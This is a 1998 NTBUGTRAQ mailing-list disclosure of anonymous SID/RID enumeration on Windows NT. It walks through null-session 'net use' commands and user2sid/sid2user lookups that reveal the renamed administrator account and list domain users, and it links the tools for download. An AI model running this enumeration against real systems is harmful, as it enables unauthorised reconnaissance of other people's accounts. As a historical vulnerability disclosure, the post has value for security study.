From: Evgenii Borisovich Rudnyi Sent: Tuesday, April 28, 1998 3:22 PM To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: name of built-in administrator While learning what SID is, I have written two utilities, user2sid and sid2user, which are actually command line interfaces to WIN32 functions, LookupAccountName and LookupAccountSid. So, no hacking, just what is permitted by MS. Now, it happens that to use these function a user have just to be EVERYONE. It means that an ordinary user can find without a problem a built-in domain administrator name, which MS recommends us to rename from administrator to something else (see for example, course 803, Administrating Windows NT 4.0). Assuming that user's computer is in the domain, the task is solved by two steps. 1) Looking up a SID of any domain account, for example Domain Users user2sid "domain users" S-1-5-21-201642981-56263093-24269216-513 Now we know all the subauthorities for the current domain. All the domain account SIDs are different by the last number only (so called RID). 2) Looking up an built-in administrator name (RID is always 500) sid2user 5 21 201642981 56263093 24269216 500 Name is SmallUser Domain is DomainName Type of SID is SidTypeUser 3) Now it is possible to look up all the domain accounts from the very first one (RID = 1000 for the first account, 1001 for the second and so on, RIDs are never used again for the current installation). sid2user 5 21 201642981 56263093 24269216 1000 sid2user 5 21 201642981 56263093 24269216 1001 ... It should be interesting for everyone to know the history of developing the domain account database. Well, this is not the end of the story. The anonymous logon is also in the EVERYONE group. This means that actually it is possible to find out who is a built-in administrator and to see the history of the SAM at any domain into which you can run the anonymous session. Note that anonymous sessions are not audited by logon/logoff category. I have tried it here on several MS APEC and SD centers. It happens that none of their administrators has bothered to disable netbios ports. So, below is an example of what you can learn provided the netbios ports are open (the listing is fictional). nslookup www.xyz.com Non-authoritative answer: Name: www.xyz.com Address: 131.107.2.200 net use \\131.107.2.200\ipc$ "" /user:"" The command completed successfully. user2sid \\131.107.2.200 "domain users" S-1-5-21-201642981-56263093-24269216-513 Number of subauthorities is 5 Domain is XYZ_domain Length of SID in memory is 28 bytes Type of SID is SidTypeGroup sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 500 Name is XYZAdmin Domain is XYZ_domain Type of SID is SidTypeUser sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1000 Name is Domain is XYZ_domain Type of SID is SidTypeDeletedAccount sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1001 Name is Simpson Domain is XYZ_domain Type of SID is SidTypeUser sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1112 LookupSidName failed - no such account SP3 does not prevent this to happen (at least without further manual editing the registry). As I see it, it is not a bug. I have made nothing illegal, just following the WIN32 manual. Thus, this is the feature. For those who would like to try it, the utilities can be found at my homepages http://www.chem.msu.su/~rudnyi/NT/sid.zip The file is about 50 Kb, the link may be slow though. I give them to public domain, feel free to publish them from your servers if you want it to. Good hunting, Evgenii Rudnyi -- Chemistry Department rudnyi@comp.chem.msu.su Moscow State University http://www.chem.msu.su/~rudnyi/welcome.html 119899 Moscow +7(095)939 5452, fax+7(095)932 8846,+7(095)939 1205 Russia